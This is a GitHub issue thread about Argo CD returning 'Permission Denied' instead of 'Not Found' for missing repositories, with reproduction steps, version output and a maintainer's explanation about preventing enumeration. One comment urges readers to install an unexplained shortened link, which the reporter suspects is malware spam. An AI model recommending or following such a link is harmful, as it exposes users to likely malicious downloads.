### ISSUE TITLE
Fetching Argo CD repository resource returns "Permission Denied" instead of "Not Found".

### ISSUE THREAD

**Issue by KasnocknDave** [argoproj/argo-cd#20005]
When querying Argo CD for a repository that doesn't exit, instead of returning `Not found` or a similar status, it instead returns `Permission Denied`.
This behavior affects tooling, that directly integrates with Argo CD and breaks said integration.

Checklist:

* [x] I've searched in the docs and FAQ for my answer: https://bit.ly/argocd-faq.
* [x] I've included steps to reproduce the bug.
* [x] I've pasted the output of `argocd version`.

**Describe the bug**

Fetching an Argo CD repository resource that doesn't exist, returns `code = PermissionDenied` instead of `code = NotFound`.

Maybe related to this piece of code: https://github.com/argoproj/argo-cd/blob/v2.12.3/server/repository/repository.go#L516

**To Reproduce**

The following steps create a local cluster setup with Argo CD.
1. Create local cluster: `kind create cluster` and connect with: `kubectl config use-context kind-kind`
2. Create namespace: kubectl create ns argocd
3. Install Argo CD `kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/stable/manifests/install.yaml`
4. Install CLI and login: https://argo-cd.readthedocs.io/en/stable/getting_started/#2-download-argo-cd-cli
5. Execute: `argocd repo get "not-existent-repo"`

**Expected behavior**

The response should be `rpc error: code = NotFound`

**Version**

```shell
argocd: v2.12.3+6b9cd82
  BuildDate: 2024-08-27T15:30:40Z
  GitCommit: 6b9cd828c6e9807398869ad5ac44efd2c28422d6
  GitTreeState: clean
  GoVersion: go1.23.0
  Compiler: gc
  Platform: linux/amd64
argocd-server: v2.12.3+6b9cd82
  BuildDate: 2024-08-27T11:57:48Z
  GitCommit: 6b9cd828c6e9807398869ad5ac44efd2c28422d6
  GitTreeState: clean
  GoVersion: go1.22.4
  Compiler: gc
  Platform: linux/amd64
  Kustomize Version: v5.4.2 2024-05-22T15:19:38Z
  Helm Version: v3.15.2+g1a500d5
  Kubectl Version: v0.29.6
  Jsonnet Version: v0.20.0
```

**Comment by Aljallaf100** [comment]
install this
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)

**Comment by KasnocknDave** [comment]
> install this https://bit.ly/4evXrQ6 If you don't have the c compliator, install it.(gcc or clang)

Is this malware spam?? :open_mouth:

**Comment by blakepettersson** [comment]
This is by design to prevent enumeration attacks.

>This behavior affects tooling, that directly integrates with Argo CD and breaks said integration.

Can you give an example of the tooling which is affected and/or is broken by this behavior?

**Comment by KasnocknDave** [comment]
> This is by design to prevent enumeration attacks.
> 
> > This behavior affects tooling, that directly integrates with Argo CD and breaks said integration.
> 
> Can you give an example of the tooling which is affected and/or is broken by this behavior?

For instance IaC providers using Argo CD endpoints like Crossplane. Either way, this is a breaking change in the API, correct? Independently of the "correctness" of the response (and I am sure you have good reasons), it changed without being backwards compatible.
